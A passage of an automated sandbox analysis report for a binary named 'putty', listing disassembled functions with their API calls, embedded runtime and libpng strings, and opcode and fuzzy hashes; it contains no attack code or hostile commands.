Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: ____lc_codepage_func____lc_handle_func__getptd_localeconv
String ID: ,$false$true
API String ID: 679402580-760133229
Opcode ID: aec953b5aabf48c2c79e3392ccd22b88363f073957dcd6d9326e27f883a3b043
Instruction ID: bf236b17b37069b59329691b333b99106ad4cc8780b2044c7966a7e9d3a1131c
Opcode Fuzzy Hash: aec953b5aabf48c2c79e3392ccd22b88363f073957dcd6d9326e27f883a3b043
Instruction Fuzzy Hash: 67514AB1C00249EECB01DFA8C8819EEFBB4FF48304F14852EE649AB741E7759644CBA5

Function 0032CD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 147COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0032CD86
std::_Xinvalid_argument.LIBCPMT ref: 0032CDA3
_memmove.LIBCMT ref: 0032CE27

Part of subcall function 0032D280: std::_Xinvalid_argument.LIBCPMT ref: 0032D2B1
Part of subcall function 0032D280: std::_Xinvalid_argument.LIBCPMT ref: 0032D2D2

Strings

string too long, xrefs: 0032CD81, 0032CD9E

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: b7c18475251b25d3ec28edbbe2c3748b981175efa21ccca18f684c41572f0dce
Instruction ID: d62ad4c62445e2728a15840f2965741ae345228b68ff567fa8eb65bc0372d841
Opcode Fuzzy Hash: b7c18475251b25d3ec28edbbe2c3748b981175efa21ccca18f684c41572f0dce
Instruction Fuzzy Hash: 3D4107723202209B8625DE5CFCC086EF7AAEFD17223201A3EE542CB650DB719C05C7A5

Function 003233B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142COMMON

Download Yara Rule

APIs

Part of subcall function 003251A0: _vwprintf.LIBCMT ref: 003251AC

Part of subcall function 00321A20: std::_Xinvalid_argument.LIBCPMT ref: 00321A39
Part of subcall function 00321A20: std::_Xinvalid_argument.LIBCPMT ref: 00321A5A
Part of subcall function 00321A20: std::_Xinvalid_argument.LIBCPMT ref: 00321A78
Part of subcall function 00321A20: _memmove.LIBCMT ref: 00321AEF

Part of subcall function 00323180: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000,D747BB9A,00000000,00000000,00000000,?,?,003DA563,000000FF), ref: 003231E9
Part of subcall function 00323180: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,00000000,?,?,003DA563,000000FF,?,003236F4), ref: 00323235

__CxxThrowException@8.LIBCMT ref: 00323444

Part of subcall function 003B9164: RaiseException.KERNEL32(Z 2,?,D747BB9A,003DD6C4,0032205A,?,00402D5C,?,D747BB9A), ref: 003B91A6

LocalFree.KERNEL32(?,00000000,-00000002), ref: 00323536
__CxxThrowException@8.LIBCMT ref: 00323566

Part of subcall function 003251A0: __vswprintf_c.LIBCMT ref: 0032520F

Strings

K#2, xrefs: 0032340A, 00323467

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$ByteCharException@8MultiThrowWide$ExceptionFreeLocalRaise__vswprintf_c_memmove_vwprintf
String ID: K#2
API String ID: 3783310149-4126186962
Opcode ID: c291f4444917592e34e989649cc8bc39c4ad24edf5453653abc30526503dbc8f
Instruction ID: e7c7ee037e9d6be8a7dd5656efa0ab6ec485d7263eca0a10245a14dcc2fecd25
Opcode Fuzzy Hash: c291f4444917592e34e989649cc8bc39c4ad24edf5453653abc30526503dbc8f
Instruction Fuzzy Hash: A151ADB1418350ABC312DF64D881B9BB7E8BF88714F108A1DF1A5D7280EB74E608CB92

Function 0033B330 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0033B3A9
CloseHandle.KERNEL32(?), ref: 0033B486
CloseHandle.KERNEL32(?), ref: 0033B4A0

Strings

Hr>, xrefs: 0033B4D0

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: CloseHandle$_memmove
String ID: Hr>
API String ID: 2469993522-1570767797
Opcode ID: 9673f7c8136354f7e122e864a9d95c685e35d504c504ba726a4a6bde6a74382a
Instruction ID: 17326ead19bb8eec4175ffe242f07fc94ed39d3b27ede3eea5eb0a8b757b85c1
Opcode Fuzzy Hash: 9673f7c8136354f7e122e864a9d95c685e35d504c504ba726a4a6bde6a74382a
Instruction Fuzzy Hash: 6F5149B1910B008FD721DF69C881B57F7E8BF44314F058A2ED69A87A51EB75F808CB55

Function 00338CE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00338D5C
std::_Xinvalid_argument.LIBCPMT ref: 00338D76
_memmove.LIBCMT ref: 00338DCC

Strings

string too long, xrefs: 00338D57, 00338D71

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 9ea75edd2198131d55562763b841afaa4028e85b49610369ccad49d2408d6204
Instruction ID: c0ea745780b6b932933eb39babb6297f38268044df8ad8a0f2cc075d9cf4669e
Opcode Fuzzy Hash: 9ea75edd2198131d55562763b841afaa4028e85b49610369ccad49d2408d6204
Instruction Fuzzy Hash: 383183323107105BD7269F6CE8C096AF7EAEBE1720B60462EF5968B6C1CF709C4583A4

Function 00324C50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00324CBC
std::_Xinvalid_argument.LIBCPMT ref: 00324CD9
_memmove.LIBCMT ref: 00324D37

Strings

string too long, xrefs: 00324CB7, 00324CD4

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 4cd701c1cd5ebaf0b75c3e1bd6d71d8a82cdb676dc96e4ea15dff5d75995ed23
Instruction ID: 20c34ccc83073b070d1b6610c7c93d8b712ac4f99432184f62974c7a2d1f4470
Opcode Fuzzy Hash: 4cd701c1cd5ebaf0b75c3e1bd6d71d8a82cdb676dc96e4ea15dff5d75995ed23
Instruction Fuzzy Hash: F531C3327156309B8736DE5DF88086AF3EAFFD4721321462FE142CBA51DB70E84587A0

Function 00348000 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 109COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003480AE

Strings

Incomplete compressed datastream, xrefs: 003480FC
Data error in compressed datastream, xrefs: 00348103
Buffer error in compressed datastream, xrefs: 0034810A

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memmove
String ID: Buffer error in compressed datastream$Data error in compressed datastream$Incomplete compressed datastream
API String ID: 4104443479-2671400078
Opcode ID: 424d130db858372771f05512cccc63a7c7dd96e3b44bb9acb36d65e072119b30
Instruction ID: b6ee079f42ffece2e5ee7ccaa3bc7018fed99ecd8a7320c21157c508f8c718f9
Opcode Fuzzy Hash: 424d130db858372771f05512cccc63a7c7dd96e3b44bb9acb36d65e072119b30
Instruction Fuzzy Hash: 17319271B1060AABCB16DFB988806ADB7E5BB08310F11422AE939DF740DB31FD559BC1

Function 003442D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

_fprintf.LIBCMT ref: 003443C8
_fprintf.LIBCMT ref: 003443DE

Strings

libpng warning: %s, xrefs: 003443BA
#, xrefs: 0034435F

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _fprintf
String ID: #$libpng warning: %s
API String ID: 1654120334-2074682317
Opcode ID: 0c726a6d74d90e82e945daaa30f3c797a44739c753f34d97f62271181f0a1088
Instruction ID: 6fc4c416ffda084e1f5635dce18b84d2e709b5cdf68115a53462744ddb3fa176
Opcode Fuzzy Hash: 0c726a6d74d90e82e945daaa30f3c797a44739c753f34d97f62271181f0a1088
Instruction Fuzzy Hash: F631AC259040844ADF1BCE6C98453FDB7E8BF51B04F1940FDE98ACF642EE21BD695741

Function 0034B43F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0034B54C

Part of subcall function 003B93AA: HeapFree.KERNEL32(00000000,00000000,?,003B9472,?), ref: 003B93C0
Part of subcall function 003B93AA: GetLastError.KERNEL32(?,?,003B9472,?), ref: 003B93D2

Strings

error in user chunk, xrefs: 0034B4E4
Call to NULL read function, xrefs: 0034B573
unknown critical chunk, xrefs: 0034B50F

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID: Call to NULL read function$error in user chunk$unknown critical chunk
API String ID: 1353095263-824878587
Opcode ID: 66b327e5a558c9c95379913ac68959348a2e3df7d8fc70cf6e8971e9f7191a38
Instruction ID: bfe5e6055d59633c17a3205b69f250001b4e055a71eb2a90f1edc0e2f3c946fb
Opcode Fuzzy Hash: 66b327e5a558c9c95379913ac68959348a2e3df7d8fc70cf6e8971e9f7191a38
Instruction Fuzzy Hash: 3831F361701B404BD7239A79A8857ABF7D99F52304F08096DE49E8F302DB64FA05C792

Function 00330C30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00330C5C
_memset.LIBCMT ref: 00330D26

Strings

OSTA Compressed Unicode, xrefs: 00330D37
*UDF LV Info*OSTA UDF Compliant, xrefs: 00330C61

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memset
String ID: *UDF LV Info*OSTA UDF Compliant$OSTA Compressed Unicode
API String ID: 2102423945-2914124739
Opcode ID: 37af35d467a319b13fecb1eda02176676cfabb5adf32931090b562db9cfeef94
Instruction ID: 31f469114840f483efa7479b9c9bcceeae531f04d6163c528cfdba16387bc467
Opcode Fuzzy Hash: 37af35d467a319b13fecb1eda02176676cfabb5adf32931090b562db9cfeef94
Instruction Fuzzy Hash: 1141E770E402699FDB64DF68CC94BDEB7B1AB48304F0044EAE91CAB292D6705F85CF84

Function 00342F70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON

Download Yara Rule

Strings

\\.\X:, xrefs: 00343018
[sptidriver]: invalid address., xrefs: 00342F8E

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID:
String ID: [sptidriver]: invalid address.$\\.\X:
API String ID: 0-3431924950
Opcode ID: 7a61591f56fdf5ad5c17c55e6d51645a5f5acb225fe8e9416568c69d33d4758a
Instruction ID: c1fa927d51d113966d966e9b784a18790a3fd3d4416b7d580fd7889514f51389
Opcode Fuzzy Hash: 7a61591f56fdf5ad5c17c55e6d51645a5f5acb225fe8e9416568c69d33d4758a
Instruction Fuzzy Hash: 0D31C771A002189BCB01DF98EC85BEEB7B4EF48311F40012AF615BB291DB70AA048B95

Function 003511C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0035121A

Strings

Out of memory while processing unknown chunk, xrefs: 003511F4, 00351293

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memmove
String ID: Out of memory while processing unknown chunk
API String ID: 4104443479-1452066831
Opcode ID: af3640284692f4484c95f94bf0e27aa93c40cd168ba4b7a22529d40323641d9d
Instruction ID: 378a3f3cff70695a9a0b9f8cd61079058eb9fcb9fbb93a1e5624fe107768f2cd
Opcode Fuzzy Hash: af3640284692f4484c95f94bf0e27aa93c40cd168ba4b7a22529d40323641d9d
Instruction Fuzzy Hash: 6631DE306006059FEB06CF54C891FB6B3A9EF81315F09867DED088F312DB70A819CBA1

Function 00350EB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00350EF4
_memmove.LIBCMT ref: 00350F34

Strings

Out of Memory, xrefs: 00350F09
tRNS chunk has out-of-range samples for bit_depth, xrefs: 00350F77

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _malloc_memmove
String ID: Out of Memory$tRNS chunk has out-of-range samples for bit_depth
API String ID: 1183979061-1529758046
Opcode ID: d192bcd20063a8cfca913428fcf9eac625452f0321e805ba351dfe661cf7493b
Instruction ID: 2f9ff0af34babe7563093c907b3bcdd07e8601a30f0b2f95990ca7098fec6d8c
Opcode Fuzzy Hash: d192bcd20063a8cfca913428fcf9eac625452f0321e805ba351dfe661cf7493b
Instruction Fuzzy Hash: 0631F630500B52A6DB3A8F25C491BA6B3E5BF40306F158014FD088E662E776E998CBE1

Function 00342AB0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 80COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00342AED

Part of subcall function 003B7968: std::exception::exception.LIBCMT ref: 003B797D
Part of subcall function 003B7968: __CxxThrowException@8.LIBCMT ref: 003B7992

Strings

gfff, xrefs: 00342B36
gfff, xrefs: 00342AF7
vector<T> too long, xrefs: 00342AE8

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: gfff$gfff$vector<T> too long
API String ID: 2884196479-3369487235
Opcode ID: 4537afe9affa856c083f79a8bef99c34e2443e0fb1d52d778356f65946f25f80
Instruction ID: 735181d0a348bcf115585de97a92d0f96126cfa4b73baae53bc25e6a76ea26b1
